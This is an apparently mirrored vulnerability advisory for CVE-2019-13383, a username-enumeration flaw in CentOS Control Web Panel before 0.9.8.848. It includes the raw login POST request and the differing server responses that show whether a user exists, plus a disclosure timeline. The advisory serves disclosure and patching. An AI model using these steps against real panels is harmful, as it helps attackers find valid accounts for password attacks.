扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 |
# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message # Date: 15 July 2019 # Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak # Vendor Homepage: https://control-webpanel.com/changelog # Software Link: Not available, user panel only available for lastest version # Version: 0.9.8.836 to 0.9.8.847 # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-13383 # ==================================================================== # Information # ==================================================================== Product : CWP Control Web Panel version : 0.9.8.838 Fixed on: 0.9.8.848 Test on : CentOS 7.6.1810 (Core) Reference : https://control-webpanel.com/ CVE-Number: 2019-13383 # ==================================================================== # Root course of the vulnerability # ==================================================================== The server response different message between login with valid and invalid user. This allows attackers to check whether a username is valid by reading the HTTP response. # ==================================================================== # Steps to Reproduce # ==================================================================== 1. Login with a random user by using invalid password POST /login/index.php?acc=validate HTTP/1.1 Host: 192.168.80.137:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: d41d8cd98f00b204e9800998ecf8427e X-Requested-With: XMLHttpRequest Content-Length: 30 Connection: close Referer: https://192.168.80.137:2083/login/?acc=logon username=AAA&password=c2Rmc2Rm 2. Check the HTTP response body 2.1 User does not exist (server response suspended) HTTP/1.1 200 OK Server: cwpsrv Date: Mon, 15 Jul 2019 01:39:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/7.0.32 Content-Length: 9 suspended 2.2 User does exist (server response nothing) HTTP/1.1 200 OK Server: cwpsrv Date: Mon, 15 Jul 2019 01:40:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/7.0.32 Content-Length: 0 3. HTTP response body format depends on software version, but all of them keep responding differently as the example below ------------------------------------------------------------ |Username| Password | Result | ------------------------------------------------------------ |valid | valid | login success| |valid | invalid| {"error":"failed"} | |invalid | invalid| {"error":"user_invalid"} | ------------------------------------------------------------ # ==================================================================== # PoC # ==================================================================== https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md # ==================================================================== # Timeline # ==================================================================== 2019-07-06: Discovered the bug 2019-07-06: Reported to vendor 2019-07-06: Vender accepted the vulnerability 2019-07-11: The vulnerability has been fixed 2019-07-15: Published # ==================================================================== # Discovered by # ==================================================================== Pongtorn Angsuchotmetee Nissana Sirijirakal Narin Boonwasanarak |
体验盒子
